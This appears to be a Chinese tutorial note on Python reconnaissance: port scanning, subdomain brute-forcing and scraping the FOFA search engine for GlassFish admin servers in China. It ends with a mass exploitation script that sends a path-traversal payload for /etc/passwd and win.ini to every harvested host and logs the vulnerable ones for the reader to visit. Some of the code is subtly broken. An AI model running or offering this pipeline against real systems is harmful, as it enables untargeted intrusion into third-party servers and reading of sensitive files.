python信息搜集

信息搜集

查询ip：

ip=socket.getaddrinfo(url,'http')

判断cdn：

#py 调用系统命令
cdn_data=os.popen("nslookup "+url)
cdn_data=cdn_data.read()
x=cdn_data.count(('.'))#根据.的个数判断

端口扫描：

#自写socket协议tcp，udp扫描
#可能出现判断有误
def port_scan(url):
    ports = {20, 21, 22, 23, 25, 69, 79, 80, 88, 110, 113, 119, 220, 443, 456, 513, 544, 548, 553, 555, 568, 569, 635,636, 666, 993, 1001, 1011}
    server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    for port in ports :
        result = server.connect_ex((url,port))
        if result==0:
            print(port,'|open')
        else:
            print(port,'|close')

查询子域名

def zym_check(url):
    #字典扫描
    for zym in open('dic.txt'):
        zym=zym.replace('\n','')
        zym_url=zym+'.'+url
        try:
            #根据域名查ip，查到则有
            ip=socket.gethostbyname(zym_url)
            print(zym_url+" ->"+ip)
            time.sleep(0.1)
        except Exception as e:
            pass

fofa

import requests
import base64
from lxml import etree
fofa='https://fofa.info/result?qbase64='
#qbase64查询内容base64加密
search='"glassfish" && port="4848" && country="CN"'
#必须带有cookie才可以查询
header={
    'Cookie': 'cookies',
}
search=str(base64.b64encode(search.encode('utf-8')),"utf-8")# base 64
size=20
for page in range(1,10):
    result=requests.get((fofa+search+'&page='+str(page)),headers=header).content.decode('utf-8')
    soup=etree.HTML(result)
    ips=soup.xpath('//a[@target="_blank"]/@href')
    ipdata='\n'.join(ips)
    with open(r'ip.txt','a+') as f:
        #查询的结果写入文件
        f.write(ipdata+'\n')
        f.close()

读取文件并判断是否存在漏洞

import requests
import urllib3
urllib3.disable_warnings()
import time
for ip in open('ip.txt'):
    ip=ip.replace('\n','')
    if ip.count()==0:
        continue
    payload_windows = ip + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
    payload_linux = ip + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    data_linux_code = requests.get(payload_linux,verify=False).status_code
    time.sleep(0.1)
    data_windows_code = requests.get(payload_windows,verify=False).status_code
    time.sleep(0.1)
    if data_linux_code == 200 or data_windows_code == 200:
        print(ip)
        with open(r'vuln.txt', 'a+') as f:
           f.write(ip+'\n')

vuln.txt中寻找有问题的网站，访问即可